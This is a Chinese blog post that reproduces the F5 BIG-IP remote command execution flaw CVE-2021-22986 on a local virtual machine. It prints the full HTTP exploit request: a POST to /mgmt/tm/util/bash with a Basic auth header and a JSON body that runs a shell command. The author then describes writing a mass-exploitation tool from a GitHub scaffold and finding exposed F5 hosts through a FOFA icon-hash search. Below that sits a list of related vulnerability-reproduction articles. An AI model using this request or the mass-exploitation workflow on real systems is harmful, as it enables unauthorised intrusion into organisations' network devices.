脚本小子是如何复现漏洞(CVE-2021-22986)并实现批量利用

简介: 脚本小子是如何复现漏洞(CVE-2021-22986)并实现批量利用

伊始


前几天看了眼F5-RCE的poc,复制粘贴了一下。


01d6a8e2d0a2e701fb1dce9bdf8d15cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

荣获脚本小子称号。。。

748bc47d8e7f86849a6e85c2821d24d8_640_wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1.jpg


漏洞复现


注册账号:

https://login.f5.com/resource/registerEmail.do

邮箱激活之后,来下载。


c10394aaf0930985c7dd1dba66d46f00_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

858f6181428adb073bb447fb985471cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

530a40278920eee7a518d7ee2aaf0f62_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


因为下载的是ova格式的,我的电脑是mac,所以用了VMware Fusion Pro来运行它


0c5ad4d4dbdda836bf98a72613c0ac08_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


导入完成后,输入

用户名:root

密码:default

成功登陆后,输入config


ff03cd3b87dcbf456bfc149ddd7d1153_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


确定服务ip


e642e098a6148e3d6be30bf5889e0552_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


直接登陆后可以命令执行。


8d2e7b834d405ee53f41555bde647983_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


不过跟公开的poc不太一样,因为他的认证方式是cookie,同时我们需要知道后台账号密码才可以rce。


X-F5-Auth-Token:

Authorization: Basic YWRtaW46QVNhc1M=


又去看了之前发布的公告,漏洞影响的版本范围。

于是我去下载了16.0.0


1d23d1e1d71298e0a85326d3bce6c895_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


poc直接打本地,成功


POST /mgmt/tm/util/bash HTTP/1.1

Host: 192.168.0.105

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:86.0) Gecko/20100101 Firefox/86.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

X-F5-Auth-Token:

Authorization: Basic YWRtaW46QVNhc1M=

Content-Length: 47

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Referer: https://192.168.0.103/tmui/login.jsp

Upgrade-Insecure-Requests: 1


{

"command":"run",

"utilCmdArgs":"-c id"

}


0678fb45f55db68c16210c7afefa279b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


批量利用工具编写


这个时候我们必须Diy下漏洞批量工具。

前往https://github.com/tangxiaofeng7/TSLab-Exploit

下载我之前写过的脚手架。

idea打开它



打开Tools类



增加一个if语句


19d680291c56c5b6a0053acc695f2fa8_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


接着到exploit包下新建一个类-f5_rce 名字要跟刚刚new的函数对应


089de412d0d19ca432a35bd2a0e98594_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


一顿操作完之后。。。


fofa搜素资产


使用fofa搜索

icon_hash="xxxxxx"《清水师傅提供的》


7b50964c811a5090ecbc84a5483f4a6d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


85c5e0f37801514eaba222b16198f9eb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


相关文章
|
安全 NoSQL API
【漏洞复现】YApi NoSQL注入导致远程命令执行漏洞
YApi是一个API管理工具。在其1.12.0版本之前,存在一处NoSQL注入漏洞,通过该漏洞攻击者可以窃取项目Token,并利用这个Token执行任意Mock脚本,获取服务器权限。
1556 1
|
2月前
|
安全 Java PHP
Web安全-命令执行漏洞
Web安全-命令执行漏洞
32 2
|
安全 数据安全/隐私保护
亿邮电子邮件系统远程命令执行漏洞 漏洞复现
亿邮电子邮件系统远程命令执行漏洞 漏洞复现
730 0
|
安全 测试技术
漏洞复现--CVE-2020-0796getshell
漏洞复现--CVE-2020-0796getshell
漏洞复现--CVE-2020-0796getshell
|
开发框架 安全 PHP
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
593 0
|
开发框架 安全 PHP
ThinkPHP5 5.0.23 远程代码执行漏洞 漏洞复现
ThinkPHP5 5.0.23 远程代码执行漏洞 漏洞复现
969 0
|
安全 Linux Windows
WEB漏洞-RCE代码及命令执行漏洞
WEB漏洞-RCE代码及命令执行漏洞
|
安全 Java fastjson
Log4j2漏洞复现&原理&补丁绕过
Log4j2漏洞复现&原理&补丁绕过
|
资源调度 安全 Ubuntu
CVE-2021-3560漏洞复现及原理分析
CVE-2021-3560漏洞复现及原理分析
271 0
|
安全 Shell
【漏洞预警】CVE-2022-26134 Confluence 远程代码执行漏洞POC验证与修复过程
【漏洞预警】CVE-2022-26134 Confluence 远程代码执行漏洞POC验证与修复过程
770 0
【漏洞预警】CVE-2022-26134 Confluence 远程代码执行漏洞POC验证与修复过程